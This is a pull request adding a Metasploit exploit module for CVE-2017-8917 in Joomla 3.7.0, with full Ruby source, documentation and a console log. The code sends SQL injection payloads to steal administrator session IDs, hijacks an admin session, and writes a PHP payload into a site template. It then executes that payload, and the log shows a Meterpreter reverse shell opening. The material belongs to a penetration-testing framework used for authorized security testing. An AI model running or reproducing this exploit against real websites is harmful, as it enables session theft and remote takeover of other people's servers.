### PR TITLE
Add 2017-8917 RCE for Joomla 3.7.0

### DIFF
--- a/documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
+++ b/documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
-  This module exploits a sql injection in the core of Joomla 3.7.0.
-  This vulnerability can allow remote code execution.
+  This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
+  With the SQLi, its possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
 
 ## Verification
 
@@ -15,7 +15,7 @@
 
 ## Scenarios
 
-### Joomal 3.7.0 and an administrator must be authenticated in the backend
+### Joomal 3.7.0 on Ubuntu 16.04 with another user authenticated as an administrator
 
 ```
 msf > use exploit/unix/webapp/joomla_comfields_sqli_rce 

--- a/documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
+++ b/documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
-  This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
-  With the SQLi, its possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
+  This module exploits a SQL Injection vulnerability in the 'com_fields' component which was introduced to the core of Joomla in version 3.7.0.
+  With the SQLi, it's possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
 
 ## Verification
 

--- a/documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
+++ b/documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
@@ -1,0 +1,49 @@
+## Vulnerable Application
+
+  This module exploits a sql injection in the core of Joomla 3.7.0.
+  This vulnerability can allow remote code execution.
+
+## Verification
+
+
+  1. Start msfconsole
+  2. Do: `use exploit/unix/webapp/joomla_comfields_sqli_rce`
+  3. Do: `set rhost [ip]`
+  4. Do: `set tageturi [uri]`
+  5. Do: `exploit`
+  6. Get a shell
+
+## Scenarios
+
+### Joomal 3.7.0 and an administrator must be authenticated in the backend
+
+```
+msf > use exploit/unix/webapp/joomla_comfields_sqli_rce 
+msf exploit(joomla_comfields_sqli_rce) > set rhost 1.2.3.4
+rhost => 1.2.3.4
+msf exploit(joomla_comfields_sqli_rce) > set TARGETURI joomla_demo
+TARGETURI => joomla_demo
+msf exploit(joomla_comfields_sqli_rce) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.4:4444 
+[*] 192.168.0.15:80 - Retrieved table prefix [ l6crq ]
+[*] 192.168.0.15:80 - Retrieved admin cookie [ 0nva1b7d2re73dojsakmq5gqs5 ]
+[*] 192.168.0.15:80 - Retrieved unauthenticated cookie [ b41f947841f591f08bb4203036a1b7d3 ]
+[+] 192.168.0.15:80 - Successfully authenticated as Administrator
+[*] 192.168.0.15:80 - Creating file [ 4duqOQWjqycE1.php ]
+[*] 192.168.0.15:80 - Following redirect to [ /joomla_demo/administrator/index.php?option=com_templates&view=template&id=503&file=LzRkdXFPUVdqcXljRTEucGhw ]
+[*] 192.168.0.15:80 - Token [ cdec8f07a07e2810437f8f8a148b7628 ] retrieved
+[*] 192.168.0.15:80 - Template path [ /templates/beez3/ ] retrieved
+[*] 192.168.0.15:80 - Insert payload into file [ 4duqOQWjqycE1.php ]
+[*] 192.168.0.15:80 - Payload data inserted into [ 4duqOQWjqycE1.php ]
+[*] 192.168.0.15:80 - Executing payload
+[*] Sending stage (37543 bytes) to 1.2.3.4
+[*] Meterpreter session 1 opened (192.168.0.24:4444 -> 1.2.3.4:49586) at 2018-03-06 20:20:22 -0500
+[+] Deleted 4duqOQWjqycE1.php
+
+meterpreter > sysinfo
+Computer    : luisco-VirtualBox
+OS          : Linux luisco-VirtualBox 4.10.0-38-generic #42~16.04.1-Ubuntu SMP Tue Oct 10 16:32:20 UTC 2017 x86_64
+Meterpreter : php/linux
+
+```

--- a/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
+++ b/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Joomla Component Fields SQLi Remote Code Execution",
+      'Name'           => 'Joomla Component Fields SQLi Remote Code Execution',
       'Description'    => %q{
         This module exploits a SQL injection vulnerability found in Joomla versions
         3.7.0.
@@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2017-8917' ], # SQLi
+          ['EDB', '42033'],
           [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
         ],
       'Payload'        =>
@@ -38,10 +39,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          [ 'Joomla 3.7.0 ', {} ]
+          [ 'Joomla 3.7.0', {} ]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "May 17 2017",
+      'DisclosureDate' => 'May 17 2017',
       'DefaultTarget'  => 0))
 
       register_options(
@@ -68,9 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def sqli( tableprefix , option)
 
     # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
-    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
+    # The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
     # This way we make sure that's excluded and we only get real admin sessions.
-    
     if option == 'check'
       sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
     else
@@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       })
 
-  
     return res
 
   end
@@ -110,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Retrieve the admin session using our retrieved table prefix
     res = sqli("#{table_prefix}_", 'exploit')
-    
+
     if res && res.code == 500 && res.body =~ /qqq(.*)qqq/
       auth_cookie_part = $1
       print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
@@ -133,14 +132,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Modify cookie to authenticated admin
     auth_cookie = cookie_begin
-    auth_cookie << "="
+    auth_cookie << '='
     auth_cookie << auth_cookie_part
-    auth_cookie << ";"
+    auth_cookie << ';'
 
     # Authenticated session
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
       'cookie'  => auth_cookie
       })
 
@@ -154,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Retrieve template view
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
       'cookie'  => auth_cookie,
       'vars_get' => {
         'option' => 'com_templates',
@@ -183,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{peer} - Creating file [ #{filename}.php ]")
     res = send_request_cgi({
       'method'   => 'POST',
-      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
       'cookie'  => auth_cookie,
       'vars_get' => {
         'option' => 'com_templates',

--- a/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
+++ b/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Joomla
 
   def initialize(info={})
     super(update_info(info,
@@ -44,11 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'May 17 2017',
       'DefaultTarget'  => 0))
-
-      register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
-        ])
 
   end
 

--- a/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
+++ b/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
@@ -1,0 +1,272 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Joomla Component Fields SQLi Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a SQL injection vulnerability found in Joomla versions
+        3.7.0.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mateus Lino', # Vulnerability discovery
+          'luisco100 <luisco100[at]gmail.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-8917' ], # SQLi
+          [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          # Arbitrary big number. The payload gets sent as POST data, so
+          # really it's unlimited
+          'Space'       => 262144, # 256k
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Joomla 3.7.0 ', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "May 17 2017",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
+        ])
+
+  end
+
+  def check
+
+    # Request using a non-existing table
+    res = sqli(rand_text_alphanumeric(rand(10)+6), 'check')
+
+    if res && res.body =~ /qpqjq(.*)qqqqq/
+      table_prefix = $1
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+
+  end
+
+
+  def sqli( tableprefix , option)
+
+    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
+    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
+    # This way we make sure that's excluded and we only get real admin sessions.
+    
+    if option == 'check'
+      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
+    else
+      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x717171,(SELECT MID(session_id,1,42) FROM #{tableprefix}session where userid!=0 LIMIT 1),0x7171717171),4879))"
+    end
+    # Retrieve cookies
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "index.php"),
+      'vars_get' => {
+        'option' => 'com_fields',
+        'view' => 'fields',
+        'layout'=> 'modal',
+        'list[fullordering]' => sql
+        }
+      })
+
+  
+    return res
+
+  end
+
+
+  def exploit
+
+    # Request using a non-existing table first, to retrieve the table prefix
+    res = sqli(rand_text_alphanumeric(rand(10)+6), 'check')
+
+    if res && res.code == 500 && res.body =~ /qpqjq(.*)qqqqq/
+
+      table_prefix = Base64.decode64($1)
+      table_prefix.sub! '_session', ''
+      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
+    end
+
+    # Retrieve the admin session using our retrieved table prefix
+    res = sqli("#{table_prefix}_", 'exploit')
+    
+    if res && res.code == 500 && res.body =~ /qqq(.*)qqq/
+      auth_cookie_part = $1
+      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
+    end
+
+    # Retrieve cookies
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php")
+    })
+
+    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
+      cookie_begin = $1
+      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
+    end
+
+    # Modify cookie to authenticated admin
+    auth_cookie = cookie_begin
+    auth_cookie << "="
+    auth_cookie << auth_cookie_part
+    auth_cookie << ";"
+
+    # Authenticated session
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'cookie'  => auth_cookie
+      })
+
+    if res && res.code == 200 && res.body =~ /Control Panel - Joomla - Administration/
+      print_good("#{peer} - Successfully authenticated as Administrator")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Session failure")
+    end
+
+
+    # Retrieve template view
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'cookie'  => auth_cookie,
+      'vars_get' => {
+        'option' => 'com_templates',
+        'view' => 'templates'
+        }
+      })
+
+    # We try to retrieve and store the first template found
+    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&amp;view=template&amp;id=([0-9]+)&amp;file=([a-zA-Z0-9=]+)/
+      template_id = $1
+      file_id = $2
+
+      form = res.body.split(/<form action=([^\>]+) method="post" name="adminForm" id="adminForm"\>(.*)<\/form>/mi)
+      input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
+      input_id = input_hidden[7].split("\"")
+      input_id = input_id[1]
+
+    else
+      fail_with(Failure::Unknown, "Unable to retrieve template")
+    end
+
+
+
+    filename = rand_text_alphanumeric(rand(10)+6)
+    # Create file
+    print_status("#{peer} - Creating file [ #{filename}.php ]")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'cookie'  => auth_cookie,
+      'vars_get' => {
+        'option' => 'com_templates',
+        'task' => 'template.createFile',
+        'id' => template_id,
+        'file' => file_id,
+        },
+      'vars_post' => {
+        'type' => 'php',
+        'address' => '',
+        input_id => '1',
+        'name' => filename
+      }
+      })
+
+
+
+    # Grab token
+    if res && res.code == 303 && res.headers['Location']
+      location = res.headers['Location']
+      print_status("#{peer} - Following redirect to [ #{location} ]")
+      res = send_request_cgi(
+        'uri'    => location,
+        'method' => 'GET',
+        'cookie' => auth_cookie
+      )
+
+      # Retrieving template token
+      if res && res.code == 200 && res.body =~ /&amp;([a-z0-9]+)=1\">/
+        token = $1
+        print_status("#{peer} - Token [ #{token} ] retrieved")
+      else
+        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
+      end
+
+      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
+        template_path = $1
+        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
+      else
+        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
+      end
+
+    else
+      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
+    end
+
+    filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
+
+    # Inject payload data into file
+    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'cookie'  => auth_cookie,
+      'vars_get' => {
+        'option' => 'com_templates',
+        'view' => 'template',
+        'id' => template_id,
+        'file' => filename_base64,
+        },
+      'vars_post' => {
+        'jform[source]' => payload.encoded,
+        'task' => 'template.apply',
+        token => '1',
+        'jform[extension_id]' => template_id,
+        'jform[filename]' => "/#{filename}.php"
+      }
+      })
+
+    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
+      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
+    end
+
+    # Request payload
+    register_files_for_cleanup("#{filename}.php")
+    print_status("#{peer} - Executing payload")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
+      'cookie'  => auth_cookie
+    })
+
+  end
+end

--- a/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
+++ b/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2017-8917' ], # SQLi
-          ['EDB', '42033'],
+          [ 'EDB', '42033' ],
           [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
         ],
       'Payload'        =>


### PR DESCRIPTION

## Description

This module exploits a SQL Injection vulnerability in the 'com_fields' component which was introduced to the core of Joomla in version 3.7.0.
  With the SQLi, it's possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.

## Vulnerable Application
Joomla  version 3.7.0.


## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/joomla_comfields_sqli_rce`
- [ ] `set RHOST ...`
- [ ] `set TARGETURI ...`
- [ ] `exploit`
You should get a shell.

## Options
### TARGETURI

TARGETURI by default is /, however it can be changed.

## Scenarios

### TESTED AGAINST LINUX
```
msf > use exploit/unix/webapp/joomla_comfields_sqli_rce 
msf exploit(joomla_comfields_sqli_rce) > set rhost 1.2.3.4
rhost => 1.2.3.4
msf exploit(joomla_comfields_sqli_rce) > set TARGETURI joomla_demo
TARGETURI => joomla_demo
msf exploit(joomla_comfields_sqli_rce) > exploit

[*] Started reverse TCP handler on 1.2.3.4:4444 
[*] 192.168.0.15:80 - Retrieved table prefix [ l6crq ]
[*] 192.168.0.15:80 - Retrieved admin cookie [ 0nva1b7d2re73dojsakmq5gqs5 ]
[*] 192.168.0.15:80 - Retrieved unauthenticated cookie [ b41f947841f591f08bb4203036a1b7d3 ]
[+] 192.168.0.15:80 - Successfully authenticated as Administrator
[*] 192.168.0.15:80 - Creating file [ 4duqOQWjqycE1.php ]
[*] 192.168.0.15:80 - Following redirect to [ /joomla_demo/administrator/index.php?option=com_templates&view=template&id=503&file=LzRkdXFPUVdqcXljRTEucGhw ]
[*] 192.168.0.15:80 - Token [ cdec8f07a07e2810437f8f8a148b7628 ] retrieved
[*] 192.168.0.15:80 - Template path [ /templates/beez3/ ] retrieved
[*] 192.168.0.15:80 - Insert payload into file [ 4duqOQWjqycE1.php ]
[*] 192.168.0.15:80 - Payload data inserted into [ 4duqOQWjqycE1.php ]
[*] 192.168.0.15:80 - Executing payload
[*] Sending stage (37543 bytes) to 1.2.3.4
[*] Meterpreter session 1 opened (192.168.0.24:4444 -> 1.2.3.4:49586) at 2018-03-06 20:20:22 -0500
[+] Deleted 4duqOQWjqycE1.php

meterpreter > sysinfo
Computer    : luisco-VirtualBox
OS          : Linux luisco-VirtualBox 4.10.0-38-generic #42~16.04.1-Ubuntu SMP Tue Oct 10 16:32:20 UTC 2017 x86_64
Meterpreter : php/linux
```


